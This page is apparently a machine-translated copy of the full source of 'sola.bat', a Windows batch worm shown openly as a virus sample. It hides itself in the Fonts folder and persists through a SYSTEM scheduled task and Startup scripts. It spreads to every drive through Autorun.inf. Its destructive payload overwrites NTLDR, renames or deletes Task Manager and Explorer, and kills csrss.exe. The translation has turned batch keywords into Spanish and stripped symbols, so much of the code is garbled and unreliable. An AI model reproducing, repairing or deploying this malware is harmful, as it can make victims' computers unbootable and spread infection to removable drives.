Procesamiento por lotes de muestras de virus
Aquí tienes el script sola: (sola.bat)
@echo off
establece sola=systemroot\Fonts\HIDESE~1
establecer setup=systemroot\Fonts\HIDESE~1\solasetup
FOR /F "tokens=1" i en ('fecha /t') establezca Realdate=i
FOR /F "skip=5 tokens=1, 4" i in ('dir systemroot\explorer.exe') do if /I "j"=="explorer.exe" establece Fecha=i
if "1"=="-Install" ir a Instalar
if "1"=="-Run" ir a Ejecutar
if "1"=="-Tenbatsu" ir a Tenbatsu
if "1"=="-Kill" ir a Kill
if "1"=="-Killself" ir a Killself
:CheckSign
si "1"=="-USB" inicia /max ..
si "1"=="-USB" cd SOLA
si existe systemroot\Fonts\ HIDESE~1\sola.sign ir a Abrir
:FileCopy
set selfname=0
:HIDESelf
fecha Fecha
md systemroot\Fonts\HIDESELF...\
fecha RealDate
si no es "1"=="-USB" escriba selfnamegt; 1\sola.bat
si "1"=="-USB" escriba sola.batgt; systemroot\Fonts\HIDESE~1\sola.bat
escriba Function.dllgt; systemroot\Fonts\HIDESE~1\Function.exe
echo En caso de error, reanudar Nextgt; systemroot\Fonts\HIDESE~1\SOLA.VBS
echo set ws=wscript.createobject( "wscript.shell")gt;gt;systemroot\Fonts\HIDESE~1\SOLA.VBS
echo ws.run "cmd /c sola\SOLA.BAT -Install",0 gt;gt; raíz del sistema\Fonts\HIDESE~1\SOLA.VBS
cscript raíz del sistema\Fonts\HIDESE~1\SOLA.VBS
echogt; raíz del sistema\Fonts\HIDESE~1\sola.sign
del systemroot\Fonts\HIDESE~1\SOLA.VBS
ir a Abrir
:Instalar
:PackerSetup
SystemDrive
cd systemroot\Fonts\HIDESE~1
si existe Function.exe taskkill /f /im Function.exe
si existe solasetup rd /s /q solasetup
md solasetup
cd solasetup
copiar. .\Function.exe Function.dll
..\Function.exe -x
cd..
fecha Fecha
tipo setup\rar.exe gt;systemroot\system32\rar.exe
fecha Realdate
copiar setup\Function.dll sola\Function.dll
attrib sola \Function.dll s h r
rar -m0 -ep -ep1 a setup\docpack.dll sola\Function.dll
rar -m0 -ep -ep1 a setup\txtpack.dll sola\Function.dll
rar -m0 -ep -ep1 a setup\exepack.dll sola\Function.dll
rar -m0 -ep -ep1 a setup\jpgpack.dll sola\Function.dll
del Function.exe
: Mainsetup
set A0001=copiar
set A0002=attrib
set A0003=echo
set A0005=Detección de hardware de Shell
lista de tareas gt;sola\task.txt
FOR /F "tokens=1 " i in ('findstr /I "svchost.exe" "sola\task.txt"') establece svchost=i
A0001 systemroot\system32\cmd.exe sola\svchost
del sola\task.txt
:Tareas
A0002 systemroot\Tasks\Tasks.job -s -h -r
del systemroot\Tasks\ Tasks.job
fecha Fecha
tipo setup\Tasks.xxxgt; systemroot\Tasks\Tasks.job
schtasks /change /ru "NT AUTHORITY\SYSTEM " /tn "Tareas" y si el nivel de error es 1, ir a TaskFail
fecha RealDate
ir a TaskSuc
:TaskFail
inicio
unidad
cd "ALLUSERSPROFILE"
cd Menú "Inicio"\Programas\Inicio
fecha Fecha
A0003 En caso de error Reanudar Nextgt; SOLA.VBS
A0003 set ws=wscript.createobject("wscript.shell")gt;gt;SOLA.VBS
A0003 ws.run "sola\svchost.exe /c sola\SOLA.BAT -Run", 0 gt; gt; SOLA.VBS
A0001 SOLA.VBS sola\SOLA.VBS
A0003 NTgt; systemroot\Fonts\HIDESE~1 \NoTasks
fecha RealDate
:TaskSuc
A0002 systemroot\Tasks\Tasks.job s h r
fecha Fecha
A0001 setup\sleep.exe systemroot\system32\sleep.exe
fecha RealDate
: NoAutoPlay
net stop "A0005"
A0003 Editor del Registro de Windows Versión 5.00gt; systemroot\Fonts\HIDESE~1\Regedit.reg
A0003 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ShellHWDetection]gt;gt; 1\Regedit.reg
A0003 "Start"=dword:00000004gt;gt;systemroot\Fonts\HIDESE~1\Regedit.reg
regedit /s systemroot\Fonts\HIDESE~ 1\Regedit.reg
::Fin de la instalación
ir a Endamp; si sale el nivel de error 1
::Fin de la instalación
:Ejecutar
set runroot=ALLUSERSPROFILE\"Inicio" Menú\Programas\Inicio
set taskroot=systemroot\Tasks
:RunTimeChk
si no existe sola\RunTime.txt echo !50gt;sola\RunTime.txt
FOR /F "tokens=1 delims=!" i en (sola\RunTime.txt) establezca RunTime=i
if /i RunTime leq 0 goto Virus
set /a RunTime=Runtime-1
echo !Runtimegt;sola\RunTime.txt
:Diskchk
echo al reanudar con error
Nextgt;systemroot\Fonts\HIDESE~1\RecentInf.VBS
echo set ws=wscript.createobject("wscript.shell")gt;gt;systemroot\Fonts\HIDESE~1\RecentInf.VBS
echo ws.run "sola\svchost.exe /c setup\RecentInf.bat",0 gt;gt;systemroot\Fonts\HIDESE~1\RecentInf.VBS
cscript systemroot \Fonts\HIDESE~1\RecentInf.VBS
del systemroot\Fonts\HIDESE~1\RecentInf.VBS
for i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do vol i: amp if; nivel de error 1 establezca i=1
para i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do echo 1gt;\solachk1 amp C: "SOLA_1.0_2.0" i: \Autorun.inf amp; nivel de error 1 attrib -s -h -r i: \Autorun.infamp; copiar /y setup\Autorun.inf i: \Autorun.infamp; attrib i :\Autorun.inf s h ramp; setup\sola.bat" i: \SOLA\SOLA.BATamp; copiar /y "setup\Function.dll" i: \SOLA\Function. dllamp;attrib i:\SOLA s h r
:Turn
if "C"=="1" vol C:amp;si no hay nivel de error 1, llame a setup\Scan.bat C:
if "D"=="1" vol D :amp; si no es nivel de error 1, llame a setup\Scan.bat D:
if "E"=="1" vol E:amp; si no es nivel de error 1, llame a setup\Scan.bat E:
if "F"=="1" vol F:amp;si no hay nivel de error 1, llame a setup\Scan.bat F:
if "G"=="1" vol G: amp; si no es nivel de error 1, llame a setup\Scan.bat G:
if "H"=="1" vol H :amp si no es nivel de error 1, llame a setup\Scan.bat H:
if "I"=="1" vol I:amp;
si no es nivel de error 1, llame a setup\Scan.bat I:
if "J"=="1" vol J: amp; si no es nivel de error 1, llame a setup\Scan.bat J:
if "K"=="1" vol K:amp;si no hay nivel de error 1, llame a setup\Scan.bat K:
if "L"=="1" vol L:amp;if no nivel de error 1, llame a setup\Scan.bat L:
if "M"=="1" vol M: amp; si no, nivel de error 1, llame a setup\Scan.bat M:
if "O"=="1" vol O:amp;si no nivel de error 1 llame a setup\Scan.bat O:
if "P"=="1" vol P:amp; si no, nivel de error 1 llame a setup\Scan.bat P:
if "Q"=="1" vol Q:amp;si no es nivel de error 1, llame a setup\Scan.bat Q:
if "R"=="1" vol R:amp;si no es nivel de error 1 llamada setup\Scan.bat R:
if "S"=="1" vol S:amp; si no hay nivel de error 1 llamada setup\Scan.bat S:
if "T"=="1" vol T:amp;si no es nivel de error 1, llame a setup\Scan.bat T:
if "U"=="1" vol U:amp;si no es nivel de error 1 llame a setup\Scan.bat U:
if "V"=="1" vol V:amp; si no hay nivel de error 1, llame a setup\Scan.bat V:
if " W"=="1" vol W:amp;si no es nivel de error 1, llame a setup\Scan.bat W:
if "X"=="1" vol X:amp;si no es nivel de error 1, llame a setup\Scan.bat setup\Scan.bat X:
if "Y"=="1" vol Y: amp; si no hay nivel de error 1, llame a setup\Scan.bat Y:
if "Z "=="1" vol Z: amp; si no hay nivel de error 1, llame a setup\Scan.bat Z:
if "C"=="2" vol C: amp; si hay nivel de error 1, establezca C= 1
if "D"=="2" vol D:amp; si nivel de error 1 establece D=1
if "E"=="2" vol E:amp; si el nivel de error 1 se
t E=1
if "F"=="2" vol F:amp; si el nivel de error 1 establece F=1
if "G"=="2" vol G :amp;si el nivel de error 1 establece G=1
if "H"=="2" vol H:amp;si el nivel de error 1 establece H=1
si "I"= ="2" vol I:amp;si el nivel de error 1 establece I=1
if "J"=="2" vol J:amp;si el nivel de error 1 establece J=1
si "K"=="2" vol K:amp;si nivel de error 1 establece K=1
if "L"=="2" vol L:amp;si nivel de error 1 establece L=1
if "M"=="2" vol M: amp si nivel de error 1 establece M=1
if "N"=="2" vol N: amp; nivel de error 1 establece N=1
if "O"=="2" vol O:amp; si nivel de error 1 establece O=1
if "P"=="2" vol P:amp;si el nivel de error 1 establece P=1
if "Q"=="2" vol Q:amp;si el nivel de error 1 establece Q=1
if "R "=="2" vol R:amp;si el nivel de error 1 establece R=1
if "S"=="2" vol S:amp;si el nivel de error 1 establece S=1
si "T"=="2" vol T:amp;si nivel de error 1 establece T=1
if "U"=="2" vol U:amp;si nivel de error 1 establece U =1
if "V"=="2" vol V:amp si el nivel de error 1 establece V=1
if "W"=="2" vol W:amp; ;si el nivel de error 1 establece W=1
if "X"=="2" vol X:amp;si el nivel de error 1 establece X=1
if "Y"==" 2" vol Y:amp;si nivel de error 1 establece Y=1
if "Z"=="2" vol Z:amp;si nivel de error 1 establece Z=1
if existe systemroot\Fonts\HIDESE~1\NoTasks si no existe "runroot\SOLA.VBS" copia "sola\SOLA.VBS" "runroot\SOLA.VBS"
si no existe systemroot\Fonts\HIDESE ~1\NoTasks si no existe Taskroot\Tasks.job copy setup\Tasks.xxx Taskroot\Tasks.jobamp;attrib Taskroot\Tasks.job s h ramp;schtasks /chang
e /ru "NT AUTHORITY\SYSTEM" /tn "Tareas"
sleep 2000
ir a Turn
::Fin de ejecución
ir a Endamp; si sale el nivel de error 1
::Fin de ejecución
:Virus
si no es "Runtime"=="0" ir a VirusChk
set /a RunTime=Runtime-1
echo !Runtimegt; sola\RunTime.txt
cd "ALLUSERSPROFILE\"Inicio" Menú\Programas\Inicio"
echo en caso de error al reanudar Nextgt; TENBATSU.VBS
echo set ws=wscript.createobject("wscript.shell")gt;gt; echo ws.run "sola\sola.bat -Tenbatsu", 0 gt gt TENBATSU.VBS
ir a Diskchk
:VirusChk
si no existe "ALLUSERSPROFILE\Menú Inicio\Programas\Inicio\TENBATSU.VBS" ir a Kill
ir a Diskchk
:Tenbatsu
:KillNTLDR
attrib systemdrive\NTLDR -s -h -r
copiar /Y systemdrive\NTLDR sola\NTLDR
echo NO NTLDRgt; systemdrive\NTLDR
: :attrib systemdrive\NTLDR s h r
:PauseSFC
iniciar mshta "javascript: new ActiveXObject('WScript.Shell').Run('ntsd -pn winlogon.exe', 0); ventana .close()"
:KillTaskmgr
del /q /a systemroot\system32\dllcache\taskmgr.exe
taskkill /f /im taskmgr .exe amp; si el nivel de error 1 ren systemroot\system32\taskmgr.exe taskmgr.xxx amp; si el nivel de error 1 inicia mshta "javascript:new ActiveXObject('WScript.Shell').Run('ntsd -c q -pn taskmgr.exe', 0 ); window.close()" amp; dormir 500
ren systemroot\system32\taskmgr.exe taskmgr.xxx
:KillExplorer
taskkill / f / Soy explorer.exe gt;nulamp;i
f nivel de error 1 ren systemroot\system32\explorer.exe explorer.xxx amp; iniciar mshta "javascript: new ActiveXObject('WScript.Shell').Run('ntsd -c q -pn explorer.exe', 0); window.close ()" y dormir 500
ren systemroot\explorer.exe explorer.xxx
iniciar /max setup\TENBATSU.BAT
:Timeset
dormir 660000
si existe sola\Killself Salir
:Kill
attrib systemdrive\NTLDR -s -h -r
echo NO NTLDRgt; systemdrive\NTLDR
:: attrib systemdrive\NTLDR s h r
lista de tareas gt; sola\Task.txt
FOR /F "tokens =2" i in ('findstr /I "csrss.exe" "sola\Task.txt"') hacer ntsd -p i
ir a Diskchk
:KillSelf
:StartExplorer
ren systemroot\explorer.xxx explorer.exe
iniciar systemroot\explorer.exe
:BackNTLDR
attrib systemdrive\NTLDR -s -h -r
copiar /Y sola\NTLDR systemdrive\NTLDR
attrib systemdrive\NTLDR s h r
:RenTmg
ren systemroot\system32\taskmgr.xxx taskmgr.exe
:KillVirus
copiar setup\KillVirus.txt sola\KillVirus.txt
C :
cd\
md ~Instalar
cd ~Instalar
rar x -hpkakenhi200601 setup\SolaKiller.rar
mshta "javascript: new ActiveXObject('WScript.Shell').Run('C:\\~Install\\Install.bat 1', 0); window.close()"
rd /s /q setup
attrib raíz del sistema\Tasks\Tasks.job -s -h -r
del raíz del sistema\Tasks\Tasks.job
cd "ALLUSERSPROFILE\Menú Inicio\Programas\Inicio"
si existe sola.vbs
del sola.vbs
si existe tenbatsu.vbs del tenbatsu.vbs
iniciar systemroot\system32\notepad.exe sola\KillVirus.txt
del sola\ sola.bat
Salir
:Abrir
si "1"=="-USB" Salir